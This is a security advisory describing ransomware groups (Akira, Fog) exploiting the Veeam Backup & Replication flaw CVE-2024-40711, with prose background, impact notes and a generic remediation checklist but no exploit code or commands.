Analysis Summary

Ransomware groups are currently leveraging a serious security flaw that allows them to remotely execute code (RCE) on Veeam Backup & Replication (VBR) servers that are susceptible.

The security vulnerability, now tracked as CVE-2024-40711, was discovered by researchers to be caused by the deserialization of untrusted data weakness that low-complexity attacks by unauthenticated threat actors can take advantage of. On September 4, Veeam revealed the vulnerability and issued security fixes; on September 9, researchers provided a technical analysis. However, to give administrators ample time to safeguard their servers, the experts postponed posting the proof-of-concept exploit code until September 15.

Businesses employing Veeam's VBR software for cloud, virtual, and physical machine backup, restoration, and replication as a disaster recovery and data protection solution caused the delay. Because of this, threat actors who want to gain rapid access to a company's backup data find it to be a very attractive target.

The CVE-2024-40711 RCE vulnerability was rapidly discovered and used in combination with previously compromised credentials to add a point local account to the local Administrators and Remote Desktop Users groups in Akira and Fog ransomware attacks, as discovered by incident responders during the past month. Attackers dropped the Fog ransomware in one instance. During the same period, another attack tried to spread the Akira ransomware. All four cases' indicators coincide with previous Akira and Fog ransomware outbreaks.

The attackers used compromised VPN gateways without multifactor authentication enabled to gain initial access to the targets in all cases. Unsupported software versions were being used by a few of these VPNs. The attacker in the Fog ransomware event installed it on an unsecured Hyper-V server and then utilized the program rclone to steal data.

Veeam also fixed a high-severity vulnerability (CVE-2023-27532) in the Backup & Replication software last year on March 7, 2023. This vulnerability can be used to compromise backup infrastructure hosts. A few weeks later, in late March, the financially driven FIN7 threat group—known for its connections to the Conti, REvil, Maze, Egregor, and BlackBasta ransomware operations—was identified as the source of CVE-2023-27532 exploits used in attacks by a Finnish cybersecurity and privacy company.

A few months later, attacks with the Cuba ransomware targeting Latin American IT organizations and vital U.S. infrastructure were carried out using the same Veeam VBR exploit. Over 550,000 customers globally, including at least 74% of all Global 2,000 firms, reportedly use Veeam's solutions, according to the company.

Impact

• Code Execution
• Unauthorized Access
• Sensitive Data Theft
• Financial Loss

Indicators of Compromise

CVE

• CVE-2024-40711

Affected Vendors

Remediation

• Refer to the Veeam Knowledge Base for patch, upgrade, or suggested workaround information.
• Implement robust multi-layered security measures to detect and respond to ransomware and cyber espionage activities.
• Conduct regular security assessments and penetration testing to identify and mitigate vulnerabilities in critical infrastructure and government systems.
• Deploy advanced threat detection tools, such as Endpoint Detection and Response (EDR) and Network Traffic Analysis (NTA), to monitor for suspicious activities and anomalies.
• Ensure timely patching and updating of all software and systems to close known security gaps.
• Use multi-factor authentication (MFA) and strong password policies to protect user accounts from unauthorized access.
• Segment networks to limit lateral movement within the organization in case of a breach.
• Develop and maintain an incident response plan that includes procedures for ransomware attacks and data breaches.
• Train employees on cybersecurity best practices and phishing awareness to reduce the risk of social engineering attacks.
• Regularly back up critical data and ensure backups are stored securely and are not accessible from the primary network.
• Collaborate with cybersecurity firms and government agencies for threat intelligence sharing and coordinated defense strategies.
• Implement encryption for sensitive data at rest and in transit to protect against data theft.
• Limit access to critical systems and data to only those individuals who require it for their role.
• Monitor for and immediately investigate the presence of known malware and indicators of compromise associated with state-sponsored groups.
• Engage in regular cybersecurity drills and exercises to ensure readiness for potential cyber incidents.
• Ensure legal and compliance measures are in place, particularly for industries subject to specific regulatory requirements.